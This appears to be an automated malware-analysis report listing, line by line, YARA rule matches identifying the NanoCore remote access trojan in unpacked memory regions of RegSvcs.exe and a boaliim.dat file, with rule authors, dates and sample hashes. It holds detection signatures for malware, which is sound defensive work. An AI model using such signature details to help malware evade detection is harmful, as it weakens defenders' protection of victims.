Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
